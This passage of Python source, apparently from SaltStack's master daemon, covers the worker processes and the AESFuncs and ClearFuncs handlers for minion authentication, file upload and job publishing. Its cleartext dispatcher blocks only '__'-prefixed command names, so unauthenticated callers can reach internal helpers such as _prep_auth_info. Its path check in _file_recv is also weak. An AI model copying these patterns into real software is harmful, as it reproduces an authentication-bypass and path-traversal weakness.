try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
# Wait for kill should be less then parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, stats):
'''
Fire events with stat info if it's time
'''
end_time = time.time()
if end_time - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end_time - self.stat_clock, 'worker': self.name, 'stats': stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = end_time
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, load)
self._post_stats(stats)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
def run_func(data):
return self.aes_funcs.run_func(data['cmd'], data)
with StackContext(functools.partial(RequestContext,
{'data': data,
'opts': self.opts})):
ret = run_func(data)
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, data)
self._post_stats(stats)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
except (ValueError, IndexError, TypeError) as err:
log.error('Unable to load public key "%s": %s', pub_path, err)
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
:rtype: bool
:rtype: dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > self.opts['file_recv_max_size'] * 0x100000:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# have been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion pay
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
.. code-block:: bash
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict
:return: If the load is invalid, it may be returned. No key operation is performed.
:rtype: bool
:return: True if key was revoked, False if not
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra:
log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username'])
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
